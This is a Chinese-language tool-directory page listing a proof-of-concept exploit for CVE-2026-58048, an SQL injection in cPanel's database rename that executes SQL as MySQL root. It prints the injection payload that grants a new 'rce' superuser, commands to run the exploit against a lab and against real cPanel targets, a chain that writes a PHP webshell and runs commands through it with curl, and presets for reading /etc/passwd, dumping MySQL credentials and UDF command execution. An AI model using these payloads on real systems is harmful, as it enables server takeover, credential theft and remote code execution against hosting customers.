Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
POC-CVE-2026-58048 — 安全研究项目 | Kitploit
工具/GitHubGitHub/imbas007/poc-cve-2026-58048
权限提升漏洞利用Web应用程序漏洞利用Web安全渗透测试数据库安全实验室与实践
GitHubimbas007/poc-cve-2026-58048

POC-CVE-2026-58048

安全研究项目

查看仓库
161个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-58048

CVSS 4.0: 9.4(严重) | CWE-89: SQL 注入 | NVD

已认证的 cPanel 用户 → 通过数据库重命名,以 MySQL root 身份执行任意 SQL。 cPanel 在以 root 身份执行重命名操作时,不当保留了用户的会话 sql_mode(ANSI_QUOTES)——数据库名中的反引号可逃逸出标识符并注入 SQL。

root@kitploit:~
name: db`; GRANT ALL ON *.* TO 'rce'@'%' IDENTIFIED BY 'pwned!'; -- 

快速开始(Docker 实验环境)

root@kitploit:~
pip install -r requirements.txt

python3 simulate.py start   # start lab (MariaDB:13306, cPanel API:18080, Apache:18081)
python3 poc.py -t http://localhost:18080 --mysql-port 13306 --payload admin-user --verify
python3 simulate.py stop

实验模式为自动检测——无需 --lab 参数。

真实 cPanel 目标

root@kitploit:~
python3 poc.py -t https://cpanel.example.com:2083 -u user -p 'pass' \
    --payload admin-user --verify

Payload 预设

自定义 SQL:--inject "GRANT ALL ON *.* TO 'x'@'%' IDENTIFIED BY 'y'"

完整 RCE 利用链(实验环境)

root@kitploit:~
# 1. Write shell to web root
python3 poc.py -t http://localhost:18080 --mysql-port 13306 \
    --payload webshell --shell /var/www/html/shell.php

# 2. Execute commands via HTTP!
curl "http://localhost:18081/shell.php?0=id"

受影响版本

cPanel < 11.110.0.137, 11.118.0.71, 11.126.0.78, 11.134.0.48, 11.136.0.32; WP Squared < 11.138.1.6

**缓解措施:**升级,或撤销 cPanel 用户的 MySQL 功能。

参考链接

  • cPanel 安全公告
  • SecurityOnline

仅供授权的安全测试与教育使用。

下载工具
预设效果
admin-user(默认)创建 MySQL 管理员用户 rce
compact-admin短管理员 Payload(<64 字符——符合真实 cPanel 的名称限制;验证:r/p)
webshell通过 INTO OUTFILE 写入 PHP shell(--shell /var/www/html/shell.php)
read-file通过 LOAD_FILE 读取服务器文件(--file /etc/passwd)
dump-users将所有 MySQL 凭据导出至 pwn.users
udf-rce通过 UDF 执行操作系统命令